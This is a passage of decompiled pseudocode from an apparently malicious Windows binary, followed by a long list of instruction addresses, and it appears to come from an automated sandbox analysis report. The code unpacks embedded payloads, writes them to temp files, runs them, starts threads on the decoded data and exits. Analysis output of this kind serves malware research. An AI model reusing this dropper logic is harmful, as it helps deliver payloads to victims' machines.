                                                                                                                                                                                                                                                                          									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                          									__eflags = _t428;
                                                                                                                                                                                                                                                                          									_v24 = _t428;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t508 = _v20;
                                                                                                                                                                                                                                                                          								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                          								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *0x401435d & 0x000000ff;
                                                                                                                                                                                                                                                                          								if(( *0x401435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t509 = _v20;
                                                                                                                                                                                                                                                                          								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          									_t433 = E04001EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                          									L21:
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          								__eflags = _v40;
                                                                                                                                                                                                                                                                          								if(_v40 == 0) {
                                                                                                                                                                                                                                                                          									L19:
                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t439 = E04006260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                          								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                          								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                          									_t442 = E04001EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v36 =  *_v20;
                                                                                                                                                                                                                                                                          								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                          								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v13 = 0;
                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                          							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__eflags = _v48;
                                                                                                                                                                                                                                                                          							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                          								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                          								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e274; // 0x2
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									L39:
                                                                                                                                                                                                                                                                          									_t448 = _v20;
                                                                                                                                                                                                                                                                          									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                          									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                          											L90:
                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e278; // 0x3
                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                          												L93:
                                                                                                                                                                                                                                                                          												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e27c; // 0x4
                                                                                                                                                                                                                                                                          												if(__eflags == 0) {
                                                                                                                                                                                                                                                                          													_v13 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												L95:
                                                                                                                                                                                                                                                                          												L24:
                                                                                                                                                                                                                                                                          												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                          												__eflags = _t452;
                                                                                                                                                                                                                                                                          												_v48 = _t452;
                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e288; // 0x2
                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                          												goto L93;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_t317 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                          											_t455 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          											E0400A360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                          											goto L95;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                          											goto L90;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										_t321 = E04007250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                          										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          											_t528 = _v20;
                                                                                                                                                                                                                                                                          											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                          											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                          												L48:
                                                                                                                                                                                                                                                                          												_t529 = _v20;
                                                                                                                                                                                                                                                                          												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                          												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                          													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                          													E04007D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                          													E04009730( &_v932, 4);
                                                                                                                                                                                                                                                                          													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                          													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                          													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                          													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                          														L89:
                                                                                                                                                                                                                                                                          														goto L24;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_v1200 = 0;
                                                                                                                                                                                                                                                                          													_v1204 = 0;
                                                                                                                                                                                                                                                                          													_v1208 = _v56;
                                                                                                                                                                                                                                                                          													_t333 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                          														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                          														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                          														__eflags = _v1212;
                                                                                                                                                                                                                                                                          														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                          															_t349 = E04006260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                          															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                          															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                          																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                          																_v1208 = _v1216;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													__eflags = _v1204;
                                                                                                                                                                                                                                                                          													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                          														L88:
                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                          														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                          														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                          															goto L88;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                          														_t340 = E04001E60( &_v916);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          														_v1220 = _t340;
                                                                                                                                                                                                                                                                          														__eflags = _v1220;
                                                                                                                                                                                                                                                                          														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                          															_t465 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                          															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                          																E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_t539 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                          															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          																E04002510(_v1220, 0x400e290);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_v8 = 1;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													goto L89;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												_v636 = 0;
                                                                                                                                                                                                                                                                          												_v632 = 0;
                                                                                                                                                                                                                                                                          												_v640 = 0;
                                                                                                                                                                                                                                                                          												_t472 = _v20;
                                                                                                                                                                                                                                                                          												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          													_t355 = E04002070(_v52);
                                                                                                                                                                                                                                                                          													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          													_v636 = _t355;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                          													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          													_v644 = _t378;
                                                                                                                                                                                                                                                                          													__eflags = _v644;
                                                                                                                                                                                                                                                                          													if(_v644 != 0) {
                                                                                                                                                                                                                                                                          														_t381 = E04006260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                          														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                          														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                          															_t383 = E04002070(_v644); // executed
                                                                                                                                                                                                                                                                          															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          															_v636 = _t383;
                                                                                                                                                                                                                                                                          															_t563 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                          															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          																_v632 = _t386;
                                                                                                                                                                                                                                                                          																E04007B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												__eflags = _v636;
                                                                                                                                                                                                                                                                          												if(_v636 != 0) {
                                                                                                                                                                                                                                                                          													_t473 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                          													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                          														E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_t549 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                          													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          														_t361 = E040097A0(0x10);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          														_v1228 = _t361;
                                                                                                                                                                                                                                                                          														_v648 = _v1228;
                                                                                                                                                                                                                                                                          														_t551 = _v20;
                                                                                                                                                                                                                                                                          														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                          															__eflags =  *_v648;
                                                                                                                                                                                                                                                                          															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                          																E04007B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                          															 *_v648 = _v632;
                                                                                                                                                                                                                                                                          															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														__eflags =  *_v648;
                                                                                                                                                                                                                                                                          														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                          															_t368 = CreateThread(0, 0, E040077B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                          															_v652 = _t368;
                                                                                                                                                                                                                                                                          															CloseHandle(_v652);
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_t550 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                          													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          														E04002510(_v636, 0x400e290);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_v8 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												goto L24;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                          											__eflags = _v620;
                                                                                                                                                                                                                                                                          											if(_v620 == 0) {
                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											E04007B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                          											_t393 = E040097A0(0x20);
                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                          											_v1224 = _t393;
                                                                                                                                                                                                                                                                          											_v624 = _v1224;
                                                                                                                                                                                                                                                                          											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                                          											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                          											_v628 = CreateThread(0, 0, E04006DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                          											CloseHandle(_v628);
                                                                                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										goto L24;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                          								E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                          								E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                          								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                          								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                          								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                          								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                          								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v608 = 0;
                                                                                                                                                                                                                                                                          								_v612 = 0;
                                                                                                                                                                                                                                                                          								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                          								__eflags = _t415;
                                                                                                                                                                                                                                                                          								if(_t415 == 0) {
                                                                                                                                                                                                                                                                          									L37:
                                                                                                                                                                                                                                                                          									__eflags = _v608;
                                                                                                                                                                                                                                                                          									if(_v608 == 0) {
                                                                                                                                                                                                                                                                          										CloseHandle(_v328);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                          								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                          								E04006C60();
                                                                                                                                                                                                                                                                          								_t421 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                          								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          								_v616 = _t421;
                                                                                                                                                                                                                                                                          								__eflags = _v616;
                                                                                                                                                                                                                                                                          								if(_v616 == 0) {
                                                                                                                                                                                                                                                                          									E04006CF0();
                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								E040074A0();
                                                                                                                                                                                                                                                                          								ExitProcess(0);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v60 =  *_v20;
                                                                                                                                                                                                                                                                          							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                          							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                          							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                          								goto L29;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                          						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          							 *0x40130e4 = 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *0x40130e4 = 2;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L99;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
















































































                                                                                                                                                                                                                                                                          0x040062b9
                                                                                                                                                                                                                                                                          0x040062c4
                                                                                                                                                                                                                                                                          0x04006c4e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040062d4
                                                                                                                                                                                                                                                                          0x040062d9
                                                                                                                                                                                                                                                                          0x040062e0
                                                                                                                                                                                                                                                                          0x040062f9
                                                                                                                                                                                                                                                                          0x040062fc
                                                                                                                                                                                                                                                                          0x0400630e
                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                          0x04006343
                                                                                                                                                                                                                                                                          0x04006349
                                                                                                                                                                                                                                                                          0x04006354
                                                                                                                                                                                                                                                                          0x0400635d
                                                                                                                                                                                                                                                                          0x04006363
                                                                                                                                                                                                                                                                          0x04006429
                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                          0x0400636f
                                                                                                                                                                                                                                                                          0x04006375
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400637b
                                                                                                                                                                                                                                                                          0x04006381
                                                                                                                                                                                                                                                                          0x04006384
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006391
                                                                                                                                                                                                                                                                          0x04006393
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006399
                                                                                                                                                                                                                                                                          0x0400639f
                                                                                                                                                                                                                                                                          0x040063a2
                                                                                                                                                                                                                                                                          0x04006419
                                                                                                                                                                                                                                                                          0x0400641e
                                                                                                                                                                                                                                                                          0x04006424
                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                          0x040063ad
                                                                                                                                                                                                                                                                          0x040063c3
                                                                                                                                                                                                                                                                          0x040063c6
                                                                                                                                                                                                                                                                          0x040063ca
                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                          0x040063dc
                                                                                                                                                                                                                                                                          0x040063e1
                                                                                                                                                                                                                                                                          0x040063e4
                                                                                                                                                                                                                                                                          0x040063ef
                                                                                                                                                                                                                                                                          0x040063f4
                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                          0x04006408
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006320
                                                                                                                                                                                                                                                                          0x04006325
                                                                                                                                                                                                                                                                          0x0400632e
                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                          0x0400642e
                                                                                                                                                                                                                                                                          0x04006438
                                                                                                                                                                                                                                                                          0x0400643b
                                                                                                                                                                                                                                                                          0x0400644d
                                                                                                                                                                                                                                                                          0x04006450
                                                                                                                                                                                                                                                                          0x04006453
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006459
                                                                                                                                                                                                                                                                          0x0400645d
                                                                                                                                                                                                                                                                          0x04006482
                                                                                                                                                                                                                                                                          0x04006488
                                                                                                                                                                                                                                                                          0x04006493
                                                                                                                                                                                                                                                                          0x0400649c
                                                                                                                                                                                                                                                                          0x040064a2
                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                          0x040065f9
                                                                                                                                                                                                                                                                          0x040065fc
                                                                                                                                                                                                                                                                          0x04006609
                                                                                                                                                                                                                                                                          0x0400660f
                                                                                                                                                                                                                                                                          0x04006bdd
                                                                                                                                                                                                                                                                          0x04006be3
                                                                                                                                                                                                                                                                          0x04006be9
                                                                                                                                                                                                                                                                          0x04006c18
                                                                                                                                                                                                                                                                          0x04006c1e
                                                                                                                                                                                                                                                                          0x04006c24
                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                          0x04006c2a
                                                                                                                                                                                                                                                                          0x04006444
                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                          0x04006bf1
                                                                                                                                                                                                                                                                          0x04006bf7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006c01
                                                                                                                                                                                                                                                                          0x04006c07
                                                                                                                                                                                                                                                                          0x04006c0e
                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                          0x0400661b
                                                                                                                                                                                                                                                                          0x04006621
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006633
                                                                                                                                                                                                                                                                          0x04006638
                                                                                                                                                                                                                                                                          0x0400663e
                                                                                                                                                                                                                                                                          0x04006640
                                                                                                                                                                                                                                                                          0x04006647
                                                                                                                                                                                                                                                                          0x0400664a
                                                                                                                                                                                                                                                                          0x0400664e
                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                          0x04006758
                                                                                                                                                                                                                                                                          0x0400675b
                                                                                                                                                                                                                                                                          0x040069cb
                                                                                                                                                                                                                                                                          0x040069dc
                                                                                                                                                                                                                                                                          0x040069ed
                                                                                                                                                                                                                                                                          0x040069f2
                                                                                                                                                                                                                                                                          0x04006a1a
                                                                                                                                                                                                                                                                          0x04006a3c
                                                                                                                                                                                                                                                                          0x04006a42
                                                                                                                                                                                                                                                                          0x04006a49
                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                          0x04006a4f
                                                                                                                                                                                                                                                                          0x04006a59
                                                                                                                                                                                                                                                                          0x04006a66
                                                                                                                                                                                                                                                                          0x04006a6c
                                                                                                                                                                                                                                                                          0x04006a72
                                                                                                                                                                                                                                                                          0x04006a75
                                                                                                                                                                                                                                                                          0x04006b3c
                                                                                                                                                                                                                                                                          0x04006a7b
                                                                                                                                                                                                                                                                          0x04006a84
                                                                                                                                                                                                                                                                          0x04006aa0
                                                                                                                                                                                                                                                                          0x04006aa6
                                                                                                                                                                                                                                                                          0x04006aad
                                                                                                                                                                                                                                                                          0x04006ac5
                                                                                                                                                                                                                                                                          0x04006aca
                                                                                                                                                                                                                                                                          0x04006ad0
                                                                                                                                                                                                                                                                          0x04006af6
                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                          0x04006b02
